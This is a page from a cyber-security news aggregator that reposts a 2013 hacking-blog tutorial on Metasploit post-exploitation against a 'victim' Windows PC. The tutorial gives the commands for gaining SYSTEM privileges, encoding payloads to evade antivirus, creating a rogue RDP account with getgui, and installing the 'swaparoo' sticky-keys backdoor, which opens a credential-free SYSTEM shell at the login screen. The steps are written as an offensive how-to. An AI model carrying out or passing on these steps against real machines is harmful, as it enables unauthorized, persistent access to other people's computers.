Welcome to our

Cyber Security News Aggregator

.

Cyber Tzar

provide a

cyber security risk management

platform; including automated penetration tests and risk assesments culminating in a "cyber risk score" out of 1,000, just like a credit score.

Post exploitation & swaparoo backdoor.

published on 2013-08-23 15:25:00 UTC by nirav desai
Content:
Today we are going to create valid RDP user in victim pc using two method.

(1)As usual get meterpreter session of victim using metasploit.We need system privilege So use getsystem .(getsystem will work in xp. But if victim has windows 7 than you have to use bypassuac module;it will work if victim has admin provilage.But most of time detecetd by AV. So you have to encode it. )

Now we use meterpreter script which create RDP useraccount for logon.
run getgui -u username -p password.

msf-post-exploitation

Now Useraccount has been created.You can use rdesktop command to connect with victim using created credentials.

rdesktop victim i.p.

msf-post-exploitation-2

When you complete your session type following command for cleanup process; so after you logoff created useraccount will be deleted.

run multi_console_command -rc /root/msf4/logs/scripts/getgui/clean_up_what_ever_file_name.rc

(2)Now we use another method; it`s backdoor.But it`s physical backdoor; so you have to present at victim pc to get access.But backdoor is created remotely.

Download swaparoo script from here .

Put it into the /opt/msf/scripts/meterpreter folder

After that get meterpreter shell using any method.

Now type run swaparoo -h
swaparoo-backdoor

Now type  run swaparoo

swaparoo-backdoor

As you can see in image last line is  "[+] Press Shift key 5 times at Login Screen and you should be greeted by a shell!"

So when you restart victim pc & login screen appear ; just press shift key 5 times (From victim `s keyboard)you get cmd with system privilege.Now from cmd you can do anything like remove user,add user, change password.

If you want to remove this backdoor then type following command

run swaparoo -r 

What`s limitation?

Anyone who is physically  present at terminal can get system cmd just by pressing keys.Because it does not ask for credentials.
Article: Post exploitation & swaparoo backdoor. - published about 11 years ago.

https://tipstrickshack.blogspot.com/2013/08/post-exploitation-swaparoo-backdoor.html   
Published: 2013 08 23 15:25:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Views: 2

Custom HTML Block

Click to Open Code Editor